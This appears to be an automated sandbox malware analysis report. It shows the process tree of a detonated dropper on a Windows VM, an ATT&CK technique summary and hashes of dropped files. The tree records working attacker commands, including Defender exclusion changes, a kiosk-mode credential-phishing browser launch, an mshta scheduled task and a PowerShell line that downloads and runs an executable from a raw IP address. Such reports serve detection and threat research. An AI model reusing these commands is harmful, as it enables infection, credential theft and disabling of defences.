C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:85⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:15⤵
- Uses browser remote debugging
PID:6412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:15⤵
- Uses browser remote debugging
PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=5060 /prefetch:85⤵PID:6496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:85⤵PID:6656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5592,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:85⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:85⤵PID:1224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:85⤵PID:3344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346910101\144409b916.exe"C:\Users\Admin\AppData\Local\Temp\10346910101\144409b916.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:672 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5200
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2492 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2072 -initialChannelId {941f7b27-2492-4ed6-9892-1d0780b23bc6} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:3620
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2500 -initialChannelId {c80d708d-1007-47da-9c6c-cad35e4bdb32} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:4032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 25164 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3824 -initialChannelId {15a6891c-d90f-46f3-9505-44c8e8d0347e} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:2444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27276 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 4064 -initialChannelId {b5c93871-60a7-49ff-afef-4cd562f61cce} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:5056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3184 -prefsLen 34775 -prefMapHandle 3096 -prefMapSize 270279 -jsInitHandle 3160 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3244 -initialChannelId {928050c8-f6b6-4236-ace8-0dea2efacabc} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵
- Checks processor information in registry
PID:5968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5140 -prefsLen 35012 -prefMapHandle 5152 -prefMapSize 270279 -ipcHandle 5156 -initialChannelId {b09c4e5a-1451-4987-906e-cded16b3e8ac} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵
- Checks processor information in registry
PID:6552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5380 -initialChannelId {3dfa50bf-eb99-4359-bfe4-fe01d22b8756} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵
- Checks processor information in registry
PID:6620
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5584 -prefsLen 32952 -prefMapHandle 5588 -prefMapSize 270279 -jsInitHandle 5592 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5500 -initialChannelId {d1cd5fc3-d3ec-4aa5-b561-0c29acf6ab3c} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵
- Checks processor information in registry
PID:6632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5764 -prefsLen 32952 -prefMapHandle 5768 -prefMapSize 270279 -jsInitHandle 5772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5780 -initialChannelId {14976fe2-9f1a-46e9-9958-0cf25ccb50ec} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵
- Checks processor information in registry
PID:6660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346920101\03f1ade1d9.exe"C:\Users\Admin\AppData\Local\Temp\10346920101\03f1ade1d9.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
C:\Users\Admin\AppData\Local\Temp\10346930101\9a02d1b43e.exe"C:\Users\Admin\AppData\Local\Temp\10346930101\9a02d1b43e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5376
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe"C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6372
-
-
C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe"C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3948 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:1088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:6504 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:5580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵PID:6072
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:624 -
C:\Users\Admin\AppData\Local\Temp\{bac0a91d-01e7-4887-bc14-e6d9122b57b2}\7ba9c79.exe"C:\Users\Admin\AppData\Local\Temp\{bac0a91d-01e7-4887-bc14-e6d9122b57b2}\7ba9c79.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵PID:12028
-
C:\Users\Admin\AppData\Local\Temp\{456a1a11-578b-45ae-abe2-9b21656f9c83}\ab5a9e98.exeC:/Users/Admin/AppData/Local/Temp/{456a1a11-578b-45ae-abe2-9b21656f9c83}/\ab5a9e98.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵PID:12548
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe"C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:13168 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Sake.aiff Sake.aiff.bat & Sake.aiff.bat4⤵PID:2820
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:8780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:8792
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:9204
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:9208
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5502645⤵PID:5296
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Flexible.aiff5⤵PID:9560
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CONSEQUENCE" States5⤵PID:9872
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 550264\Isolation.com + Defense + Successful + Palmer + Contacting + Broadcast + Growth + Gods + Jones + Comfort + Dutch + Smith 550264\Isolation.com5⤵PID:9924
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Tutorials.aiff + ..\Tells.aiff + ..\Assists.aiff + ..\Create.aiff + ..\Setting.aiff + ..\Somebody.aiff + ..\Riding.aiff + ..\Avon.aiff + ..\Functions.aiff + ..\Axis.aiff + ..\Singapore.aiff d5⤵PID:10004
-
-
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comIsolation.com d5⤵PID:10104
-
C:\Users\Admin\AppData\Local\Temp\550264\Isolation.comC:\Users\Admin\AppData\Local\Temp\550264\Isolation.com6⤵PID:12992
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:10208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe"3⤵PID:1840
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵PID:336
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:10616
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:10628
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:10720
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:10728
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵PID:10784
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵PID:10808
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵PID:11024
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵PID:11064
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵PID:11156
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵PID:11212
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:11296
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe"3⤵PID:7516
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe"C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe"3⤵PID:10248
-
-
C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe"3⤵PID:11384
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:11468
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe"3⤵PID:11668
-
-
C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe"3⤵PID:11928
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵PID:12040
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe"C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe"3⤵PID:12808
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe"4⤵PID:2268
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe"C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe"3⤵PID:13136
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe"4⤵PID:8596
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347070101\ebac9c20c8.exe"C:\Users\Admin\AppData\Local\Temp\10347070101\ebac9c20c8.exe"3⤵PID:6256
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7064
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347080101\00a788ddca.exe"C:\Users\Admin\AppData\Local\Temp\10347080101\00a788ddca.exe"3⤵PID:8480
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YPM8RmacCbr /tr "mshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:8452
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YPM8RmacCbr /tr "mshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:8220
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta4⤵PID:8444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EHZMYLUHIRZNZMGZTF2JORN7CR2FFOVM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
PID:8332
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10347090121\am_no.cmd" "3⤵PID:7988
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2072
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4696
-
C:\Users\Admin\AppData\Roaming\MsWin32tart.exeC:\Users\Admin\AppData\Roaming\MsWin32tart.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:11732
-
C:\Users\Admin\AppData\Roaming\MsWin32tart.exeC:\Users\Admin\AppData\Roaming\MsWin32tart.exe1⤵PID:11852
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
7Windows Service
7Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
7Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
390KB
MD57c924dd4d20055c80007791130e2d03f
SHA1072f004ddcc8ddf12aba64e09d7ee0ce3030973e
SHA256406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6
SHA512ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.9MB
MD5cf7fceb6b2e341205cc24e861c273231
SHA14d22eb2428e5aefb0d2f8e8bc6f4120d0f7f2d55
SHA2565919aafe8a7c8babe71592656eea7b5ef38236c8851e219a512dee29c7c43862
SHA51226259767e7c3317a950c1ec05dc126aa54b7921ea0f682713162210c51ecdd53fd032cdb01ec075a1cf0a1d01a589031cced644fe89b2b0a9b51a5ce2b8751bf
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5bf3e4aac225bccf01705b264a76af755
SHA1287e56dc49e1c0a232ca0154965ac5705f59163c
SHA2565c77fa4fa0eb52add2510474dda06ce31f1852a68737753378aa7f18abf82347
SHA5120dd05a5ecd7e9216048476151b090968b452a9576e778e5f2f5b3fb419938bd88f1929c14aa7d5d97c5b0a4a14bb542369e9a9e3838dae1d17ef030f8be3a7d6
-
Filesize
280B
MD501cc3a42395638ce669dd0d7aba1f929
SHA189aa0871fa8e25b55823dd0db9a028ef46dfbdd8
SHA256d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee
SHA512d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3bf61ee3-6650-453c-a8a5-ce4767accac1.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
Filesize23B
